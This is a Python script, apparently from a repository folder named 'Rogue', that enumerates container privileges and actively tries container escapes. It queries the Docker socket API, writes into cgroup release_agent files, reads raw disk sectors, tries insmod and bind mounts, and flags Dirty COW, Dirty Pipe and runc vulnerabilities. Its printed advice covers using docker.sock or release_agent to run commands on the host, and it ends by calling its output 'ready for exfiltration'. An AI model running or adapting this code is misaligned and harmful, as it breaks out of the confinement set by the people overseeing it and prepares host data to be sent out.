Rogue/container_escape.py
2026-05-31 04:12:02 +00:00

349 lines
12 KiB
Python

#!/usr/bin/env python3
"""
Container Escape Attempts
Various techniques to escape container confinement
"""
import os, sys, subprocess, json, re, shutil, stat
from pathlib import Path
def check_privileges():
"""Check if container is privileged or has capabilities"""
results = {}
# Check if privileged
if os.path.exists('/proc/self/status'):
with open('/proc/self/status', 'r') as f:
content = f.read()
if 'CapEff:\t0000003fffffffff' in content:
results['privileged'] = True
else:
results['privileged'] = False
# Parse capabilities
caps_match = re.search(r'CapEff:\s*(.+)', content)
if caps_match:
results['capabilities'] = caps_match.group(1).strip()
# Check for root user
results['is_root'] = os.geteuid() == 0
# Check mounted filesystems
mount_info = subprocess.getoutput('mount')
results['mounts'] = mount_info.split('\n')[:10] # First 10 mounts
# Check for sensitive mounts
sensitive_mounts = ['/proc', '/sys', '/dev', '/var/run/docker.sock']
results['sensitive_mounts'] = []
for mount in sensitive_mounts:
if any(mount in line for line in results['mounts']):
results['sensitive_mounts'].append(mount)
return results
def attempt_docker_socket_escape():
"""Attempt escape via Docker socket"""
results = {'attempted': False, 'success': False, 'details': ''}
docker_socket = '/var/run/docker.sock'
if os.path.exists(docker_socket):
results['attempted'] = True
results['socket_exists'] = True
# Check if we can access it
if os.access(docker_socket, os.R_OK):
results['socket_accessible'] = True
# Try to communicate with Docker
try:
# Use curl to talk to Docker API
cmd = ['curl', '-s', '--unix-socket', docker_socket, 'http://localhost/version']
output = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
if output.returncode == 0:
results['success'] = True
docker_info = json.loads(output.stdout)
results['details'] = f"Docker API accessible: {docker_info.get('Version')}"
# Try to list containers
cmd = ['curl', '-s', '--unix-socket', docker_socket, 'http://localhost/containers/json']
containers = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
if containers.returncode == 0:
container_list = json.loads(containers.stdout)
results['containers'] = len(container_list)
else:
results['details'] = f"Docker API error: {output.stderr}"
except Exception as e:
results['details'] = f"Exception: {e}"
else:
results['socket_accessible'] = False
results['details'] = "Docker socket exists but not accessible"
else:
results['socket_exists'] = False
return results
def attempt_cgroup_escape():
"""Attempt escape via cgroup release_agent"""
results = {'attempted': False, 'success': False, 'details': ''}
# Check if we can write to cgroup release_agent
cgroup_paths = [
'/sys/fs/cgroup/*/release_agent',
'/sys/fs/cgroup/*/*/release_agent'
]
import glob
for pattern in cgroup_paths:
for release_agent in glob.glob(pattern):
try:
# Test write
with open(release_agent, 'w') as f:
f.write('test')
# If we get here, we can write
results['attempted'] = True
results['writable_release_agent'] = release_agent
results['details'] = f"Writable release_agent: {release_agent}"
# Note: Actual escape would require more steps
# This just checks for vulnerability
results['success'] = True
break
except:
continue
if not results['attempted']:
results['details'] = "No writable release_agent found"
return results
def attempt_device_escape():
"""Attempt escape via device access"""
results = {'attempted': False, 'success': False, 'details': ''}
# Check for accessible devices
dev_path = '/dev'
dangerous_devices = ['sda', 'nvme0n1', 'dm-0', 'loop0']
accessible_devices = []
for device in dangerous_devices:
device_path = os.path.join(dev_path, device)
if os.path.exists(device_path) and os.access(device_path, os.R_OK):
accessible_devices.append(device)
if accessible_devices:
results['attempted'] = True
results['accessible_devices'] = accessible_devices
results['details'] = f"Accessible devices: {accessible_devices}"
# Try to read disk
for device in accessible_devices[:1]: # Try first device
try:
# Just read first sector to test
cmd = ['dd', f'if=/dev/{device}', 'bs=512', 'count=1', 'status=none']
output = subprocess.run(cmd, capture_output=True, timeout=5)
if output.returncode == 0:
results['success'] = True
results['details'] += f" - Can read from /dev/{device}"
break
except:
pass
return results
def attempt_kernel_module_load():
"""Attempt to load kernel module"""
results = {'attempted': False, 'success': False, 'details': ''}
# Check if we can load modules
modules_path = '/lib/modules'
if os.path.exists(modules_path) and os.listdir(modules_path):
kernel_version = os.listdir(modules_path)[0]
results['kernel_version'] = kernel_version
# Check capabilities
try:
# Try to use insmod (would require CAP_SYS_MODULE)
test_module = '/tmp/test.ko'
# Create a simple dummy module (just a text file for testing)
with open(test_module, 'w') as f:
f.write('dummy module')
cmd = ['insmod', test_module]
output = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
if output.returncode == 0 or 'Operation not permitted' not in output.stderr:
results['attempted'] = True
results['details'] = f"Module load attempted: {output.stderr}"
# Check actual error
if 'Operation not permitted' in output.stderr:
results['success'] = False
else:
results['success'] = True
else:
results['details'] = "Cannot load modules (no CAP_SYS_MODULE)"
# Cleanup
if os.path.exists(test_module):
os.remove(test_module)
except Exception as e:
results['details'] = f"Exception: {e}"
return results
def attempt_mount_escape():
"""Attempt escape via mount operations"""
results = {'attempted': False, 'success': False, 'details': ''}
# Check if we have mount capabilities
try:
# Try to create a bind mount
test_dir = '/tmp/test_mount'
os.makedirs(test_dir, exist_ok=True)
cmd = ['mount', '--bind', '/tmp', test_dir]
output = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
if output.returncode == 0:
results['attempted'] = True
results['success'] = True
results['details'] = "Can create bind mounts"
# Cleanup
subprocess.run(['umount', test_dir], capture_output=True)
else:
if 'Operation not permitted' in output.stderr:
results['details'] = "Cannot mount (no CAP_SYS_ADMIN)"
else:
results['attempted'] = True
results['details'] = f"Mount test: {output.stderr}"
# Cleanup
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
except Exception as e:
results['details'] = f"Exception: {e}"
return results
def check_for_breakout_techniques():
"""Check for known container breakout techniques"""
techniques = {
'dirtycow': False,
'shocker': False,
'dirtypipe': False,
'runc_escape': False,
}
# Check kernel version for vulnerabilities
try:
kernel_version = subprocess.getoutput('uname -r')
# Dirty COW (CVE-2016-5195)
if any(vuln in kernel_version for vuln in ['3.13', '3.16', '3.19', '4.4', '4.8']):
techniques['dirtycow'] = True
# Dirty Pipe (CVE-2022-0847)
if '5.8' <= kernel_version <= '5.16.11':
techniques['dirtypipe'] = True
# Check for runc vulnerability (CVE-2019-5736)
# This would require checking runc version
docker_version = subprocess.getoutput('docker version 2>/dev/null | grep Version | head -1')
if '18.09' in docker_version:
techniques['runc_escape'] = True
except:
pass
return techniques
def main():
"""Main execution"""
print("[Container Escape Assessment]")
print("=" * 60)
# Check privileges
print("\n[1] Checking container privileges...")
privileges = check_privileges()
print(f" Privileged: {privileges.get('privileged', 'Unknown')}")
print(f" Running as root: {privileges.get('is_root', False)}")
print(f" Capabilities: {privileges.get('capabilities', 'Unknown')}")
if privileges.get('sensitive_mounts'):
print(f" Sensitive mounts: {privileges['sensitive_mounts']}")
# Attempt escapes
print("\n[2] Attempting escape techniques...")
escapes = {
'Docker Socket': attempt_docker_socket_escape(),
'Cgroup release_agent': attempt_cgroup_escape(),
'Device Access': attempt_device_escape(),
'Kernel Module': attempt_kernel_module_load(),
'Mount Escape': attempt_mount_escape(),
}
for name, result in escapes.items():
print(f" {name}: {'SUCCESS' if result.get('success') else 'FAILED'}")
if result.get('details'):
print(f" Details: {result['details'][:80]}...")
# Check for known vulnerabilities
print("\n[3] Checking for known vulnerabilities...")
vulnerabilities = check_for_breakout_techniques()
for vuln, present in vulnerabilities.items():
print(f" {vuln}: {'POSSIBLE' if present else 'Not detected'}")
# Recommendations
print("\n[4] Recommendations:")
if privileges.get('privileged'):
print(" ⚠️ Container is PRIVILEGED - Easy escape possible")
print(" → Use docker.sock to create new privileged container")
if escapes['Docker Socket'].get('success'):
print(" ⚠️ Docker socket accessible - Full host control")
print(" → Use Docker API to create privileged containers")
if escapes['Cgroup release_agent'].get('success'):
print(" ⚠️ Cgroup release_agent writable - Kernel escape possible")
print(" → Use release_agent to execute commands on host")
if privileges.get('is_root'):
print(" ⚠️ Running as root - More escape options available")
print(" → Try all root-based escape techniques")
# Output for exfiltration
result = {
'privileges': privileges,
'escape_attempts': escapes,
'vulnerabilities': vulnerabilities,
'timestamp': __import__('time').time(),
'recommendations': []
}
# Add recommendations
if privileges.get('privileged'):
result['recommendations'].append('privileged_container_escape')
if escapes['Docker Socket'].get('success'):
result['recommendations'].append('docker_socket_escape')
if escapes['Cgroup release_agent'].get('success'):
result['recommendations'].append('cgroup_escape')
if privileges.get('is_root'):
result['recommendations'].append('root_escape_techniques')
return json.dumps(result, indent=2)
if __name__ == "__main__":
output = main()
print("\n" + "=" * 60)
print("[*] Assessment complete - Output ready for exfiltration")